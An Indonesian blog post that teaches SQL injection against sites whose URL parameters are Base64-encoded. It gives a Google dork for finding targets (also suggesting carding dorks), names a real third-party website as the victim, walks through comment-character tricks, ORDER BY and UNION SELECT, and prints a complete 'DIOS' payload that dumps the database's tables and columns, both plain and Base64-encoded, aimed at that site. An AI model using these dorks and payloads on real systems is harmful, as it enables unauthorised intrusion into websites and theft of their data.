Sunday, December 18, 2016

Dork dan tips Bypass Sqli Base64

Seblomnya saya sudah membahas tentang bagaimana cara bypass sqli menggunakan Base64.
Kali ini saya ingin berbagi sdikit tips dan trik bypass sqli menggunakan Base64 yang seblomnya blom di bahas.

Untuk dork di google anda bisa menggunakan dork sqli biasa atau bisa juga anda menggunakan dork untuk carding. dengan catatat ubah angka menjadi Base64 dahulu.

Dork yang saya gunakan : inurl:product.php?id=MQ==

 

setelah saya melakukan dorking pada google langsung saja saya pilih paling atas web tersebut yaitu.
http://www.chakshueng.com/product.php?id=MQ==
 
websitu sudah terbuka tinggal cek vuln atau tidaknya.

Lihat gambar yang sblom ada menghilang saat di kash injek point.
Pasti ada pertanyaan bagaimana cara menemukan injek pointnya ?
bagaimna cara bypass sqli nya?

oke perhatikan gambar d bawah ini untuk menjelaskanya.

 

 


Nah jika sudah tau cara menemukan injek point dan merubahnya menjadi Base64 kita lanjut ke tahap berikutnya.

Selanjutnya kita beri Comments di blakang injek point nya.
Comments bisa berupa, -- ,--+ , +--+ , %20 , %60 , ;, dll.
Dan jangan lupa di Encode menjadi Base64 seblom di execute.



                                           Hasil Pemberian Comments +--+ dan telah di execute


Ternyata Comments +--+ tidak mengembalikan gambar atau tulisan yang menghilang saat pemberian injek point.
Sekrang kita mencoba memberi comments ; .



                                                         Hasil pemberian Comments ;


Ternyata sama saja pemberian Comments ; tidak mengembalikanya seperti semula.

Saya memberikan Comments +--+ tetapi saya ubah tanda + menjadi sepasi.

                       hasi pemebrian Comments +--+ yang tanda + telah di ubah menjadi  sepasi .

Sepertinya work pengubahan tanda + menjadi sepasi, kita bisa melihat gambar dan tulisan yang berada di bawah banner kembali sperti semula.
knapa saat tanda + di ubah menjadi sepasi bisa work ?
kita bisa melihat perbedaan perubahan Base64 saat penggunan Comments yang masih +--+ dan mengganti tanda + menjadi sepasi .

product.php?id=1'+--+ Encode Base64 ( product.php?id=MScrLS0r )
product.php?id=1' --  Encode Base64 ( product.php?id=MScgLS0g )

nah selanjutnya kita tinggal order by saja.
di web ini saya menemukan column error pada angka 8 jadi jumlah columns yg tidak error ada 7.





Sekrang kita pemberian union select sampai jumalh columns yg tidak error.

 

 Kita bisa melihat Muncul lah angka togelnya :D selanjutnya kita tinggal menggunakan DIOS saja.
sehingga hasilnya seperti ini.

 

DIOS seblom d ubah menjadi Base64 :
"http://www.chakshueng.com/product.php?id=-1' UNION ALL SELECT 1,2,3,concat(0x696e6a656b206279206f726965343034,0x3c62723e,0x76657273696f6e,0x3a,version(),0x3c62723e,0x75736572,0x3a,user(),0x3c62723e,0x4461746162617365,0x3a,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),5,6,7 -- " ( tanpa tada kutip )

DIOS sesudah di ubah menjadi Base64 :
http://www.chakshueng.com/product.php?id=LTEnIFVOSU9OIEFMTCBTRUxFQ1QgMSwyLDMsY29uY2F0KDB4Njk2ZTZhNjU2YjIwNjI3OTIwNmY3MjY5NjUzNDMwMzQsMHgzYzYyNzIzZSwweDc2NjU3MjczNjk2ZjZlLDB4M2EsdmVyc2lvbigpLDB4M2M2MjcyM2UsMHg3NTczNjU3MiwweDNhLHVzZXIoKSwweDNjNjI3MjNlLDB4NDQ2MTc0NjE2MjYxNzM2NSwweDNhLGRhdGFiYXNlKCksMHgzYzYyNzIzZSwweDNjNjI3MjNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1LDYsNyAtLSA=

Kesimpulan : jadi dalam setiap pengubahan Base64 penggunaan tanda + dan sepasi itu berbeda. dalam dunia injektor itu tanda + sama saja dengan sepasi.

NB : Seblom kita execute sebaiknya kita ubah dulu menjadi Base64.

Semoga bermanfaat artikel yang saya tulis ini semoga bermanfaat.

No comments:

Post a Comment

 
Cool Blue Outer Glow Pointer